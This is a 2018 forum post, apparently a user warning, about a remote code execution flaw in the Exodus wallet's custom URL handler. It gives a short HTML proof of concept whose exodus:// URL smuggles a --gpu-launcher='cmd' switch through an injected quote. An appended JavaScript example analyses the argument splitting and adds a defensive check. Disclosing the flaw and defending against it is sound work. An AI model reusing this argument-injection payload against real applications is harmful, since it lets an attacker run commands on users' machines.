Topic: Warning! Exodus RCE (Remote Code Execution) [Safe links]
chrusso (OP)
April 26, 2018, 09:01:27 PM

I don't know if this has been mentioned before in the forums, but take care when browsing the web with your Exodus Wallet open. The last version seems to be patched, hence it doesn't seem to be vulnerable.

Here's a safe-to-try proof of concept of the security flaw:

<!doctype html>
<script>
  window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='
</script>

You can save that as HTML if you desire and see how Exodus processes the request. Here are also 2 links to exploit-db for more information about the RCE:

- https://www.exploit-db.com/exploits/44357/
- https://www.exploit-db.com/exploits/43899/

Merit is welcome. Safe browsing!
Chris,
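
Added example, not part of the original post and not Exodus code: a sketch of how the quote in the URL above splits into extra command-line arguments when a handler is registered as `"<exe>" "%1"`, plus a launch-time check an application could run on its own argv. The splitter is simplified, the paths and the `checkProtocolLaunch` helper are hypothetical, and the guarded template assumes Chromium stops parsing switches at a bare `--`.

```javascript
// Assumption: the scheme handler is registered on Windows as  "<exe>" "%1".
// Simplified Windows-style splitter: honours double quotes only.
function splitCommandLine(cmd) {
  const args = [];
  let cur = '', inQuotes = false, started = false;
  for (const ch of cmd) {
    if (ch === '"') { inQuotes = !inQuotes; started = true; }
    else if (ch === ' ' && !inQuotes) {
      if (started) args.push(cur);
      cur = ''; started = false;
    } else { cur += ch; started = true; }
  }
  if (started) args.push(cur);
  return args;
}

// The OS substitutes the URL into the template as plain text, then the
// resulting command line is split into argv by the launched process.
function expandHandler(template, url) {
  return splitCommandLine(template.replace('%1', () => url));
}

// Launch-time check (hypothetical helper): a protocol launch should end with
// the single <scheme>:// argument. `live` lists switches that would still be
// parsed, i.e. those not preceded by a bare "--" terminator.
function checkProtocolLaunch(argv, scheme) {
  const rest = argv.slice(1);
  const urlIdx = rest.findIndex(a => a.startsWith(scheme + '://'));
  if (urlIdx === -1) return { ok: true, live: [] };
  const term = rest.indexOf('--');
  const guarded = term !== -1 && term < urlIdx;
  const trailing = rest.slice(urlIdx + 1);
  const live = guarded ? [] : trailing.filter(a => a.startsWith('--'));
  return { ok: trailing.length === 0, live };
}

// Constructed inputs: the URL is the string from the post; paths are made up.
const POC_URL = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa=';
const PLAIN = '"C:\\App\\app.exe" "%1"';
const GUARDED = '"C:\\App\\app.exe" "--" "%1"';
for (const t of [PLAIN, GUARDED]) {
  const argv = expandHandler(t, POC_URL);
  console.log(argv, checkProtocolLaunch(argv, 'exodus'));
}
```

With the plain template the URL yields two extra switches in argv; with `--` placed before `%1` the same input still fails the check but leaves no switch that would be parsed.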